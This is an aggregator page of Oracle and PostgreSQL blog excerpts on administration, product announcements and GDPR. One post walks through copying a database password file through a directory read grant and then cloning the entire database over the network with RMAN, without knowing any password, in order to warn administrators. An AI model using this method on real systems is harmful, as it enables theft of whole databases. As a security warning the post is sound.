Feed aggregator

alter table xxx shrink not reclaiming space

Tom Kyte - Tue, 2018-01-09 03:06
Dear Ask Tom Team, I hope you had wonderful vacations and happy new year!!! I have question related to Table's Space Reclaiming using "shrink" command. There are some fragmented tables in our DB. I found their current size and wasted space u...
Categories: DBA Blogs

Changing dbms_job to dbms_scheduler

Tom Kyte - Tue, 2018-01-09 03:06
Hi Tom, I have a requirement where I need to change dbms_job functionality to dbms_scheduler.Regarding that I have few query : 1.The existing dbms_job.submit_job is called within loop which calls certain procedure ex: for I in 1..10 dbms_job.su...
Categories: DBA Blogs

Export application through command prompt

Tom Kyte - Tue, 2018-01-09 03:06
I have moved some pages from 1 application to another but when exporting application through the application itself. Then some component is not working of the application. So can you provide an alternative way to export application through command p...
Categories: DBA Blogs

ORA-01722: invalid number ORA-06512: in "SYS.DBMS_SQL" - Fetching cursor with bind variables

Tom Kyte - Tue, 2018-01-09 03:06
Hi, I'm trying do run the following PL/SQL block: <code>DECLARE v_trad_cur CLOB; v_trad_par VARCHAR2 (1000); cur PLS_INTEGER := DBMS_SQL.open_cursor; fdbk NUMBER; retorn VARCHAR2 (1000); vd...
Categories: DBA Blogs

pdb_to_apppdb.sql returns ORA-65021- A workaround

Oracle in Action - Tue, 2018-01-09 01:26

RSS content

While exploring Oracle Multitenant Application Containers, I learnt that in order to convert a regular PDB  to an application PDB

  • Clone a regular PDB  into an application root
  • Connect to the cloned  PDB and execute the $ORACLE_HOME/rdbms/admin/pdb_to_apppdb.sql to convert the cloned regular PDB  to an application PDB

However, when I connected to cloned PDB remotely using @… and executed the script pdb_to_apppdb.sql, I got ORA-65021 :

SQL>@$ORACLE_HOME/rdbms/admin/pdb_to_apppdb

 

 

.

.

.

.

 

SQL>create or replace view sys.cdb$common_root_objects&pdbid sharing=object as

2  select u.name owner, o.name object_name, o.type# object_type, o.namespace nsp,

3         o.subname object_subname, o.signature object_sig,

4         decode(bitand(o.flags, &sharing_bits),

5                &edl+&mdl, 'EDL', &dl, 'DL', 'MDL') sharing

6    from sys.obj$ o, sys.user$ u

7   where o.owner#=u.user# and bitand(o.flags, &sharing_bits) <> 0

8     and bitand(o.flags,&fedobjflag)=&fedobjflag;

old   1: create or replace view sys.cdb$common_root_objects&pdbid sharing=object as

new   1: create or replace view sys.cdb$common_root_objects4 sharing=object as

old   4:        decode(bitand(o.flags, &sharing_bits),

new   4:        decode(bitand(o.flags, (65536+131072+4294967296)),

old   5:               &edl+&mdl, 'EDL', &dl, 'DL', 'MDL') sharing

new   5:               4294967296+65536, 'EDL', 131072, 'DL', 'MDL') sharing

old   7:  where o.owner#=u.user# and bitand(o.flags, &sharing_bits) <> 0

new   7:  where o.owner#=u.user# and bitand(o.flags, (65536+131072+4294967296)) <> 0

old   8:    and bitand(o.flags,&fedobjflag)=&fedobjflag

new   8:    and bitand(o.flags,134217728)=134217728

create or replace view sys.cdb$common_root_objects4 sharing=object as

*

ERROR at line 1:

ORA-65021: illegal use of SHARING clause

After various repeated trials, I realized that connecting to cloned PDB using “Alter session set container ..“ results in successful execution.

Here is the full article where I encountered this error and found out the workaround.

I faced similar issue while creating application seed from application root and resolved it by connecting to the  application seed  created from application root using Alter session set container …

Conclusion:  In order to execute the script $ORACLE_HOME/rdbms/admin/pdb_to_apppdb.sql to convert the cloned regular PDB  to an application PDB, connect to the target regular PDB by switching the container. (Do not connect remotely using @)

References:



Tags:  

Del.icio.us
Digg

Copyright © ORACLE IN ACTION [pdb_to_apppdb.sql returns ORA-65021- A workaround], All Right Reserved. 2018.

The post pdb_to_apppdb.sql returns ORA-65021- A workaround appeared first on ORACLE IN ACTION.

Categories: DBA Blogs

Partner Webcast – Accelerate Your Digital Transformation in the Cloud with Oracle Visual ...

With increasing demands for modern business applications that will serve specific business needs, and the proliferation of data sources, the speed at which IT departments address line of business...

We share our skills to maximize your revenue!
Categories: DBA Blogs

Partner Webcast – Accelerate Your Digital Transformation in the Cloud with Oracle Visual ...

With increasing demands for modern business applications that will serve specific business needs, and the proliferation of data sources, the speed at which IT departments address line of business...

We share our skills to maximize your revenue!
Categories: DBA Blogs

Announcing Offline Persistence Toolkit for JavaScript Client Applications

OTN TechBlog - Mon, 2018-01-08 19:27

We are excited to announce the open source release on GitHub of the offline-persistence-toolkit for JavaScript client applications, developed by the Oracle JavaScript Extension Toolkit (Oracle JET) team.

The Offline Persistence Toolkit is a client-side JavaScript library that provides caching and offline support at the HTTP request layer. This support is transparent to the user and is done through the Fetch API and an XHR adapter. HTTP requests made while the client device is offline are captured for replay when connection to the server is restored. Additional capabilities include a persistent storage layer, synchronization manager, binary data support and various configuration APIs for customizing the default behavior.

Whilst the toolkit is primarily intended for hybrid mobile applications created using Oracle JET, it can be used within any JavaScript client application that requires persistent storage and/or offline data access.

The Offline Persistence Toolkit simplifies life for application developers by providing a response caching solution that works well across modern browsers and web views. The toolkit covers common caching cases with a minimal amount of application-specific coding, but provides flexibility to cover non-trivial cases as well. In addition to providing the ability to cache complete response payloads, the toolkit supports "shredding" of REST response payloads into objects that can be stored, queried and updated on the client while offline.

The architecture diagram illustrates the major components of the toolkit and how an application interacts with it:

The Offline Persistence Toolkit is distributed as an npm package consisting of AMD modules.

To install the toolkit, enter the following command at a terminal prompt in your app’s top-level directory:

$ npm install @oracle/offline-persistence-toolkit

 

The toolkit makes heavy use of the Promise API. If you are targeting environments that do not support the Promise API, you will need to polyfill this feature. We recommend the es6-promise polyfill.

The toolkit does not have a dependency on a specific client-side storage solution, but does include a PouchDB adapter. If you plan to use PouchDB for your persistent store, you will need to install the following PouchDB packages:

$ npm install pouchdb pouchdb-find

 

For more information about how to make use of this toolkit in your Oracle JET application or any other JavaScript application, refer to the toolkit's README, which also provides details about why we developed this toolkit, how to include it into your app, some simple use cases and links to JS Doc and more advanced use cases.

You can also refer to the JET FixItFast sample app that makes use of the toolkit.  You can refer directly to the source code and even use the Oracle JET command line interface to build and deploy the app to see how it works.

I hope you find this toolkit really useful and if you have any feedback, please submit issues on GitHub.

For more technical articles about the Offline Persistence Toolkit, Oracle JET and other products, you can also follow OracleDevs on Medium.com.

Safari 11 on macOS Sierra and OS X El Capitan Certified with EBS 12

Steven Chan - Mon, 2018-01-08 13:11

Oracle E-Business Suite Release 12 (12.1.3, 12.2.4 or higher) is now certified with Safari 11 on the following desktop configurations.

For macOS Sierra 10.12:

  • macOS Sierra version 10.12.6 or higher
  • Safari version 11 (11.0.2 or higher)
  • Oracle JRE 8 plugin (1.8.0_121 or higher)

For OS X El Capitan 10.11:

  • OS X El Capitan 10.11.6 or higher
  • Safari version 11 (11.0.2 or higher)
  • Oracle JRE 8 plugin (1.8.0_91 or higher)

Users should review all relevant information along with other specific patching requirements and known limitations listed in:

Pending Certification 

macOS High Sierra 10.13 with Safari 11 is not yet certified for E-Business Suite. This certification is in our plans.

Oracle's Revenue Recognition rules prohibit us from discussing certification and release dates, but you're welcome to monitor or subscribe to this blog. I'll post updates here as soon as soon as they're available.    

Related Articles

Categories: APPS Blogs

How to cancel SQL statements and disconnect sessions in #PostgreSQL

The Oracle Instructor - Mon, 2018-01-08 12:29

In PostgreSQL, you can cancel problem statements or terminate offending sessions remotely with PG_CANCEL_BACKEND and PG_TERMINATE_BACKEND. This article shows how you can do it with working examples.

edb=# select current_database,current_user;
 current_database | current_user 
------------------+--------------
 edb              | enterprisedb
(1 row)

I’m connected as superuser. The demo is done with EDB Postgres Advanced Server 10.1.5 but the shown technique should work the same with other Postgres distributions and older versions. First I create a demo user:

edb=# create role adam password 'adam' login;
CREATE ROLE
edb=# grant connect on database edb to adam;
GRANT

Now opening another session with that new user:

-bash-4.2$ psql -U adam
Password for user adam: 
psql.bin (10.1.5)
Type "help" for help.

edb=> begin
edb$> loop
edb$> null;
edb$> end loop;
edb$> end;

That session burns CPU now in an endless loop. Back to the superuser session:

edb=# select pid,usename,query
edb-# from pg_catalog.pg_stat_activity where datname='edb';
  pid  |   usename    |                         query                         
-------+--------------+-------------------------------------------------------
 14346 | adam         | begin                                                +
       |              | loop                                                 +
       |              | null;                                                +
       |              | end loop;                                            +
       |              | end;
  5517 | enterprisedb | select pid,usename,query                             +
       |              | from pg_catalog.pg_stat_activity where datname='edb';
(2 rows)
This cancels the SQL statement of one session:
edb=# select pg_cancel_backend(14346);
 pg_cancel_backend 
-------------------
 t
(1 row)

The session that was doing the endless loop gets this output:

ERROR:  canceling statement due to user request
CONTEXT:  edb-spl function inline_code_block line 3 at NULL
This disconnects a single session:
edb=# select pg_terminate_backend(14346);
 pg_terminate_backend 
----------------------
 t
(1 row)

The disconnected session gets this output after trying to do anything:

edb=> \d
FATAL:  terminating connection due to administrator command
server closed the connection unexpectedly
	This probably means the server terminated abnormally
	before or while processing the request.
The connection to the server was lost. Attempting reset: Succeeded.
This way you cancel all SQL statements of a certain user:
edb=# select pg_cancel_backend(pid) from pg_stat_activity where usename='adam';
This way you disconnect all sessions of a certain user:
edb=# select pg_terminate_backend(pid) from pg_stat_activity where usename='adam';

In the unlikely event that your end users are connected with psql, it will try to reconnect them. That’s the background of the above listed output “… Attempting reset: Succeeded.” Means the session got reconnected. If you want to prevent that particular user from (re-)connecting, you need to do this additionally:

edb=# revoke connect on database edb from adam;
REVOKE ROLE

Remember to also revoke from public if you haven’t done that already, otherwise the above revoke doesn’t show any effect:

edb=# revoke connect on database edb from public;
REVOKE
Now this disconnects all sessions of one user and the above prevents new connects by that user:
edb=# select pg_terminate_backend(pid) from pg_stat_activity where usename='adam';
 pg_terminate_backend 
----------------------
 t
(1 row)

The terminated session then gets this output:

edb=> \d
FATAL:  terminating connection due to administrator command
server closed the connection unexpectedly
	This probably means the server terminated abnormally
	before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.

Keep in mind that the revoke is impacting the whole user, not just one particular session. In other words no session with that user can be established subsequently until you say:

edb=# grant connect on database edb to adam;
GRANT ROLE
You can terminate all sessions connected to one particular database – except your own session – like this:
edb=# select pg_terminate_backend(pid)
edb-# from pg_stat_activity
edb-# where datname='edb' and pid<>pg_backend_pid;

Once again, this does not prevent new sessions from connecting. So either you REVOKE CONNECT on the user layer as shown above, or you do it on the database layer.

This is how normal users are prevented from connecting to the database:
edb=# alter database edb with connection limit 0;
ALTER DATABASE

Superusers can still connect. The above is the equivalent to ALTER SYSTEM ENABLE RESTRICTED SESSION in Oracle. This is what normal users get now upon trying to connect:

-bash-4.2$ psql -U adam
Password for user adam: 
psql.bin: FATAL:  too many connections for database "edb"
The default of unlimited number of sessions allowed to connect can be set back like this:
edb=# alter database edb with connection limit -1;
ALTER DATABASE
This prevents also superusers from connecting to a database, but you must not be connected to that database yourself:
edb=# alter database edb with allow_connections false;
ERROR:  cannot disallow connections for current database

So either you connect to another existing database in the cluster or you create another database temporarily:

edb=# create database dummy;
CREATE DATABASE
edb=# \c dummy
You are now connected to database "dummy" as user "enterprisedb".
dummy=# alter database edb with allow_connections false;
ALTER DATABASE

Now both normal users and superusers get this output when trying to connect:

psql.bin: FATAL:  database "edb" is not currently accepting connections
The default that connections to that database are allowed can be set back with this command:
dummy=# alter database edb with allow_connections true;
ALTER DATABASE
dummy=# \c edb
You are now connected to database "edb" as user "enterprisedb".
edb=# drop database dummy;
DROP DATABASE

What I like especially about the shown functionality is the option to remotely cancel a particular (ongoing) statement without having to terminate the session that runs the statement. I’m not aware of a supported way to do that in Oracle. It can be done if Resource Manager has been configured appropriately beforehand, but that requires quite some effort and doesn’t work just out of the box.


Tagged: PostgreSQL
Categories: DBA Blogs

Oracle Statement

Oracle Press Releases - Mon, 2018-01-08 10:56
Press Release
Oracle Statement

Redwood Shores, Calif.—Jan 8, 2018

“We are pleased that the Court of Appeals affirmed the judgment on Rimini Street’s infringement of all 93 of Oracle’s copyrights in this case. Copyright infringement is at the core of Oracle’s dispute with Rimini, and Court of Appeals affirmed all of the trial court’s and the jury’s findings that Rimini blatantly violated copyright law. We look forward to the trial court issuing a permanent injunction against Rimini for its egregious and illegal conduct.”

—Deborah Hellinger, Vice President, Corporate Communications, Oracle
About Oracle

The Oracle Cloud offers complete SaaS application suites for ERP, HCM and CX, plus best-in-class database Platform as a Service (PaaS) and Infrastructure as a Service (IaaS) from data centers throughout the Americas, Europe and Asia. For more information about Oracle (NYSE: ORCL), please visit us at www.oracle.com.

Trademarks

Oracle and Java are registered trademarks of Oracle and/or its affiliates. Other names may be trademarks of their respective owners.

DISTINCT clause and nulls

Tom Kyte - Mon, 2018-01-08 08:46
I have a table Test_Null with columns A, B and Data Present Inside Table is: SQL>select * from test_null; A B ---------- ------ 1 NULL 2 NULL 3 NULL 4 NULL <u>Query</u> SELECT DI...
Categories: DBA Blogs

ORA-01417 when outer joining many tables in 11g but not 12c

Tom Kyte - Mon, 2018-01-08 08:46
Hi, I ran this below statement in 12C and 11g Data bases. <code>select * from temp0101 a ,temp0101 b ,temp0101 c where 1 = 1 and a.sno = b.sno(+) and c.sno = b.sno(+);</code> in 12 C it executed successfully but in 11i it throwed below error...
Categories: DBA Blogs

Partner Webcast - Data Archives (Tape)

            Data Archives (Tape) - When you...

We share our skills to maximize your revenue!
Categories: DBA Blogs

Happy New Year to my blog readers

Anthony Shorten - Sun, 2018-01-07 16:25

Welcome to 2018 for the ShortenSpot readers. This year is looking like another exciting year for the Oracle Utilities Application Framework and a new direction for the blog overall. In the past the blog has been a mixture of announcements and some advice with examples. Whilst it will still provide important technical announcements, this year we plan to have lots and lots of exciting advice with lots of example code to illustrate some amazing features you can use in the cloud, hybrid and on-premise implementations to inspire you to use the facilities provided to you.

This year we also will be doing a major refit to all the whitepapers including rationalizing the number of them (it was fast approaching 50 at one stage) and making them more relevant with more examples. This will also remove the duplication those whitepapers have with the online documentation which is now the main source of information for advice for implementations. The whitepapers will act as more supplemental materials and complementary to the online documentation.

The next few months are the busy months as we also prepare for the annual Edge conferences in the USA, APAC and Europe which will include a technical stream with a series of sessions on major technical features and some implementation advice. This year we decided to make it more beneficial for you by focussing on key implementation challenges and offer advice on how to solve implementation issues and business requirements. Each session will talk capabilities, offer general direction and offer advice garnered from our cloud implementations and advice from our implementations/partners gather over the years. Hopefully you can back from the sessions with some useful advice. The details of the 2018 Oracle Utilities Edge Customer Conference Product Forum are located at this site.

This year looks like an amazing year and I look forward to publishing a lot more often this year to benefit us all.

 

Review at amazon: Kubernetes: Up & Running

Dietrich Schroff - Sun, 2018-01-07 10:44
Between christmas and new year i read

The authors state:
"This practical guide shows you how Kubernetes and container technology can help you achieve new levels of velocity, agility, reliability, and efficiency."I think, yes - this is a practial guide, but within only 166 pages it is far too short to give relevant insights into Kubernetes. There are many commands and YAMLs shown, but the book misses a didactic preparation. Some chapters can only be understand, if you have read some later chapters.

But for only 25€ you get a good start, if you are willing to read the book twice ;-)

If you are interested, take a look at my review at amazon.com. (This time amazon.de refused my review. ;-)

Why Cloud? The reason changed in 2017…twice

Look Smarter Than You Are - Fri, 2018-01-05 10:13
In 2017, the predominant reason companies considered moving to the Cloud changed multiple times. While the “how” tends to shift frequently, seeing the “why” fundamentally shift twice in one year was fascinating (though not quite as fascinating as yesterday when LinkedIn suggested I might know both Jessica Alba and Ashton Kutcher).

The Cloud will save us money
2017 started off with companies moving to the Cloud to save money. This makes sense in a theoretical sense: you pay-as-you-go for your software instead of all up-front, you don’t have to buy your own servers, there’s no need to do installations, and there’s no IT staff needed to handle the frequent maintenance that an on-premises solution requires.

But while that’s 100% correct in the abstract (any new company would buy Cloud first before ever considering an on-prem product), there’s a sunk cost issue with existing solutions: companies already paid for all their software (minus the annual “support maintenance”), they already bought their servers, someone already installed the software, and there’s an existing staff dedicated to maintaining servers that has plenty of other things they can be doing once they stop dealing with the drudgery of daily maintenance activities. While there’s money to be saved with new solutions, and there’s definitely money to be saved in the long-run on converting existing implementations to the Cloud, the short-term savings are trumped by the sunk cost fallacy.

As companies started moving en masse to the Cloud, a compelling new motivation began appearing in Spring of 2017.

Let’s make our server someone else’s problem
Companies began realizing that servers and data centers are a huge headache: a distraction from their core competencies. Trying to make sure servers stay up and running whenever we need to access them shouldn’t be any more of a focus than starting our car: the engine should always work and if it doesn’t, someone far more qualified than we are should fix it.

All of a sudden, people were going to the Cloud so they never had to deal with their servers again: uptime was assumed, patches were someone else’s problem, and backups just happened. And as this happened, the Cloud became more like Google: when was the last time you pondered where Google’s servers are located or when the last time was that Google did a backup? And the reason you don’t invest brain power into Google maintenance thought experiments is that it’s Google’s problem. While the Cloud may be causing someone else sleepless nights keeping those servers up and running, that someone is not making their problem your problem.

So, we spent the next several months of “The Year of the Cloud” (trademark pending) going to the Cloud so we never had to deal with our servers again.

Power to the People!
In late 2017, organizations going to the Cloud began to notice something weird: business people were starting to own their own systems and access their data directly. A noble aim long desired by users everywhere, this has heretofore been impossible because on-premises systems take a lot of effort to administrate. It took consultants or IT personnel to build the systems, modify them, and in the end, those same people controlled access to the systems.

The Cloud changed all that: with a new focus on end users and self-service, the power to change things (add an account, build a new report, modify a form, create new analysis) moved to the people who are the first to know when a change needs to be met. At first, I thought this self-service paradigm would increase the workload on the business, but it turns out that they were having to do all the requesting of the changes anyway and quickly making those changes themselves was far faster. Why should I have to make a request to see my own data rather than just go wander through it on my own (preferably on a mobile device)?

And so we ended 2017 with a new drive – a new “why” – of the Cloud. Give the power to the people. The other reasons aren’t lost: they just took a backseat to the new user-first world of the Cloud. Now when someone asks me “why should our company move to the Cloud?”, I tell them “because it gives your business people the power to make better business decisions faster.”

At least, that’s my answer at the start of 2018.

What’s the next shift?
Each year, I conduct a global survey of Business Analytics. Last year, I asked over 250 companies how they were doing in the world of reporting, analysis, planning, and consolidation.  If you want to see where the next shift is coming from before it happens, I’m unveiling the results of this year’s survey on a webcast January 31, 2018, at 2PM Eastern, where you’ll learn how your BI & EPM (Business Intelligence & Enterprise Performance Management) stacks up against the rest of the world. To register, go to:


If you have any questions, ask them in the comments or tweet them to me @ERoske.
Categories: BI & Warehousing

RMOUG Training Days 2018 early registration deadline rapidly approaching

Bobby Durrett's DBA Blog - Fri, 2018-01-05 10:02

The deadline for early registration for RMOUG Training Days 2018 is rapidly approaching. The deadline is January 12. The early registration fee is $385 for RMOUG members and $450 for non-members. There is a packed agenda over the three-day event. The hotel costs are reasonable at $159/night which is very good compared to the hotel prices at the vendor conferences in San Francisco. RMOUG is reasonably priced and high quality training. With all of the change going on with cloud computing and some of the database systems that are competing with Oracle now I am looking forward to hearing from other people about how they are adapting in this changing climate.

I am giving two talks which are both about personal development for DBAs. One is about whether a DBA should learn the Python programming language. The other is about whether DBAs could benefit from communication and leadership training through Toastmasters. Here are the dates and times for my two talks:

Toastmasters for the Oracle DBA
Thursday, February 22
Session 12, 1:30 pm – 2:30 pm

Python for the Oracle DBA
Thursday, February 22
Session 14, 4:00 pm – 5:00 pm

As things change it makes sense for DBAs to continue to develop themselves and I think that my talks and the conference in general will help us to move forward by preparing us to meet the challenges that the future will bring. I hope to see you in Denver and don’t forget to register by January 12.

B0bby

 

Categories: DBA Blogs

Keep your orapw password file secure

Yann Neuhaus - Fri, 2018-01-05 06:02

This is a small demo I did when I’ve found a database password file (orapw) lying around in /tmp with -rw-rw-rw- permissions, to show how this is a bad idea. People think that the orapw file only contains hashes to validate a password given, and forget that it can be used to connect to a remote database without password.

I can easily imagine why the orapwd was there in /tmp. To build a standby database, you need to copy the password file to the standby server. If you don’t have direct access to the oracle user, but only a sudo access for ‘security reasons’, you can’t scp easily. Then you copy the file to /tmp, make it readable by all users, and you can scp with your user.

In this demo I don’t even have access to the host. I’ve only access to connect to a PDB with the SCOTT users, reated with utlsampl.sql, with those additional privileges, a read access on $ORACLE_HOME/dbs:

SQL> connect sys/oracle@//192.168.56.122/PDB1 as sysdba

Connected.

SQL> create or replace directory DBS as '/u01/app/oracle/product/12.2.0/dbhome_1/dbs';

Directory DBS created.

SQL> grant read on directory DBS to SCOTT;

Grant succeeded.
People tend to grant many privileges, and think that a read access on a directory which is supposed to contain only configuration files is harmless. Let’s see what you can do from another server.

Get the orapw file from a remote connection

I connect with SCOTT which can read from ORACLE_HOME/dbs:

SQL> connect scott/tiger@//192.168.56.122/PDB1

Connected.

SQL> show user

USER is "SCOTT"

SQL> select * from all_directories;

OWNER DIRECTORY_NAME DIRECTORY_PATH ORIGIN_CON_ID

----- -------------- -------------- -------------

SYS DBS /u01/app/oracle/product/12.2.0/dbhome_1/dbs 4
I create a table to read this file (other possibilities utl_tile, external tables,…):

SQL> create table DEMO ( b blob );

Table DEMO created.

SQL> insert into demo values ( bfilename('DBS','orapwCDB1') );

1 row inserted.
I’m on another server with the same version of Oracle Database software installed.

I use sqlplus to retrieve the server file to my client:

sqlcl -s scott/tiger@//192.168.56.120/PDB1 < $ORACLE_HOME/dbs/orapwCDB1

set pages 0 lin 17000 long 1000000000 longc 16384

select * from DEMO;

exit

EOF
This (documented by Laurent Schneider) uses sqlplus to display the BLOB variable as hexadecimal code and xdd (installed with vim-common) to revert it to binary.

So, on my server I have a copy of the database password file for the database I want to steal:

[oracle@VM122 ~]$ strings /u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapwCDB1

ORACLE Remote Password file

X)l)|

SYSDG

+933k\

SYSBACKUP

f ts6 $9

SYSKM
Pull

A nice feature of 12c is the ability to pull backups from a service. With this, it is the destination that connects to the source. I have diagrams to explain here). It is an easy alternative to RMAN DUPLICATE (see MOS Doc ID 2283978.1 Creating a Physical Standby database using RMAN restore from service). And one difference is that you don’t have to provide the password:

I prepare a small init.ora and directory for the datafiles

echo "db_name=CDB1" > $ORACLE_HOME/dbs/initCDB1.ora

mkdir -p /u01/oradata/CDB1
I’m still on my server with the copy of the remote orapw file and a network access to the source database and I just restore it, without the need for a password:

RMAN> connect target /

connected to target database (not started)
I start a local instance:

RMAN> startup nomount force

Oracle instance started

Total System Global Area 859832320 bytes

Fixed Size 8798552 bytes

Variable Size 784338600 bytes

Database Buffers 58720256 bytes

Redo Buffers 7974912 bytes
I restore the controlfile:

RMAN> restore controlfile from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

using target database control file instead of recovery catalog

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: restoring control file

channel ORA_DISK_1: restore complete, elapsed time: 00:00:02

output file name=/u01/oradata/CDB1/control01.ctl

output file name=/u01/fast_recovery_area/CDB1/control02.ctl

Finished restore at 05-JAN-18
That’s the interesting part because it has to be connected, at least as SYSOPER, to the source database but I didn’t provide any password.

I mount this controlfile locally:

RMAN> alter database mount;

Statement processed

released channel: ORA_DISK_1
And now it is easy to pull the whole database (the CDB with all its PDBs) to my local server:

RMAN> restore database from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

Starting implicit crosscheck backup at 05-JAN-18

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

Crosschecked 6 objects

Finished implicit crosscheck backup at 05-JAN-18

Starting implicit crosscheck copy at 05-JAN-18

using channel ORA_DISK_1

Finished implicit crosscheck copy at 05-JAN-18

searching for all files in the recovery area

cataloging files...

cataloging done

List of Cataloged Files

=======================

File Name: /u01/fast_recovery_area/CDB1/autobackup/2018_01_04/o1_mf_s_964524009_f4vzyt59_.bkp

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_15_f4w5vv19_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_16_f4wmm0t8_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_14_f4vzjdl1_.arc

using channel ORA_DISK_1

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: specifying datafile(s) to restore from backup set

channel ORA_DISK_1: restoring datafile 00001 to /u01/oradata/CDB1/system01.dbf

channel ORA_DISK_1: restore complete, elapsed time: 00:00:16

channel ORA_DISK_1: starting datafile backup set restore

...
So what?

This is not an issue and is totally expected. In a Data Guard configuration, the primary and standby database have to communicate with each others and then need a passwordless authentication. This is done with the password file, and this is the reason why you need to copy it rather than just create another one with the same passwords.

So, there is more than just a hash of the password (which is required to validate a password) and probably includes a key (randomly generated when you create the password file) used for passwordless authentication.

Then, be careful, and do not give read access to the orapw files. You must secure them in the same way as a ssh key or an encryption wallet. and this include:

  • Do not leave a copy of the orapw file in a shared location
  • Be careful with grants on directories, even in READ
  • Do not grant CREATE ANY DIRECTORY except for a PDB with PATH_PREFIX lockdown
 

Cet article Keep your orapw password file secure est apparu en premier sur Blog dbi services.

GDPR compliant by installing software editors tools?

Yann Neuhaus - Fri, 2018-01-05 02:51

In few months (25 May 2018) the EU General Data Protection Regulation (GDPR) will be in force and will replace the Data Protection Directive 95/46/EC. His goals are to harmonize data privacy laws across Europe, to protect and empower all EU citizens’ data privacy and to reshape the way organizations across the region approach data privacy. You can find all information related to GDPR on https://www.eugdpr.org and the official PDF of the Regulation (EU) 2016/679 on https://gdpr-info.eu/

GDPR

GDPR

 

The biggest change of GDPR compared to Data Protection Directive 95/46/EC is perhaps the extended jurisdiction as it applies to all companies processing the personal data of data subjects residing in the Union, regardless of the company’s location. But other key points such a penalties, consent, breach notification, right to access, right to be forgotten, data portability, privacy by design and data protection officers have been added to this Regulation.

From 25 May 2018 on, non-compliant organizations will face heavy penalties in terms of fine and reputation. Indeed according to the Regulation, non-compliant organizations can be fined up to 4% of annual global turnover for breaching GDPR or €20 Million. However there is no minimum fine or even an automatic fine in case of violation. To decide whether to impose a fine and its amount, the following items can be taken into consideration: the nature, severity and duration of the violation, the number of persons impacted, the impact on the persons, the measures taken to mitigate the damage, first or subsequent breach, and finaly the cooperation with the authority to remedy the violation. There is currently no clear procedure for a foreign authority to collect the fine imposed on a Swiss company without presence in the EU.

The impact of the GDPR is worldwide since it doesn’t only affect EU organization but all companies processing and holding the personal data of data subjects residing in the European Union, regardless of the company’s location. Meaning that all countries (even Switzerland and UK) are affected. You can find the official information regarding GDPR provided by the Swiss Confederation on the following link and the current Federal Act on Data protection here (Note: The Swiss Data Protection Act which is currently under revision will incorporate key regulations similar to the GDPR).  You can find the status of the UK Data Protection Bill on the Following link.

According to the GDPR the personal data definition is the following:
Any information related to a natural person or ‘Data Subject’, that can be used to directly or indirectly identify the person. It can be anything from a name, a photo, an email address, bank details, posts on social networking websites, medical information, or a computer IP address.

To protect these personal data, the GDPR has 99 articles divided in 11 chapters. Two of these articles, the article 25 (Data protection by design and default) and article 32 (Security of Processing) are usually put forward by software vendors: Oracle, Microsoft, IBM. These editors usually use these articles to promote encryption and anonymization tools which can make sense depending on the personal data hosted as the GDPR requires an adapted approach, depending on the nature and the scope of the personal data impacted. Indeed, encryption at rest may be appropriate depending on the circumstances, but they are not mandated by the GDPR in every instance.

In other terms the technical tools can help to be in conformity regarding a small subset of the Regulation but the GDPR is mostly about processes related to personal data identification and treatment. You will probably have a better understanding of what I mean by having a look on the two checklists (one for data controllers and one for data processors) provided by the ICO (UK Information Commissioner’s Office) on the following link. After having completed the checklist you will get an overall rating, a list of suggested actions and guidance.

 

Cet article GDPR compliant by installing software editors tools? est apparu en premier sur Blog dbi services.

Pages

Subscribe to Oracle FAQ aggregator